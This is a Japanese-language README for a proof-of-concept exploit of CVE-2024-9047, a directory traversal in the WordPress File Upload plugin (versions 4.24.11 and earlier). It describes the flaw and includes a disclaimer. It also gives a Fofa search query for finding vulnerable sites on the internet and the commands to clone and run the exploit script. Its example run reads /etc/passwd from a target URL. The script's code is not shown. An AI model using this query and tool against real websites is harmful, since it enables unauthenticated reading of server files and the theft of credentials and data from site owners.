
POC - WordPress File Upload プラグイン、wfu_file_downloader.php ファイル内、バージョン 4.24.11 以前
WordPress File Upload プラグインは、wfu_file_downloader.php ファイルにおける不適切な入力検証により脆弱です。影響を受けるバージョンは <= 4.24.11 です。この脆弱性により、認証されていないユーザーがサーバーのファイルシステムから任意のファイルをダウンロードでき、データの外部流出やシステム侵害につながる可能性があります。
File Upload プラグインのバージョン <= 4.24.11 を実行している WordPress ウェブサイト。
この脆弱性は、File Upload プラグインの wfu_file_downloader.php コンポーネントに存在し、リクエスト内の file パラメータと handler パラメータを不適切に処理します。これにより、ディレクトリトラバーサル攻撃が可能になり、機密ファイルにアクセスできるようになります。
詳細はこちら — CVE-2024-9047
免責事項: この Proof of Concept(POC)は、教育および倫理的なテスト目的のみで作成されています。事前の相互同意なしにターゲットを攻撃するためのこのツールの使用は違法です。適用されるすべての地域、州、連邦の法律を遵守する責任はエンドユーザーにあります。開発者は一切の責任を負わず、このプログラムによって引き起こされた誤用や損害についても責任を負いません。
潜在的なターゲットを特定するには、以下のクエリで Fofa(Shodan.io に類似した検索エンジン)を使用できます。
body="wp-content/plugins/wp-file-upload" && body="wordpress-file-upload-style-css"
まず、リポジトリをクローンします。
git clone https://github.com/verylazytech/CVE-2024-9047
cd CVE-2024-9047
chmod +x cve-2024-9047
エクスプロイトを実行します:
bash ./cve-2024-9047.sh <url> <file>
./cve-2024-9047.sh www.vulnerablewebsite.com /etc/passwd
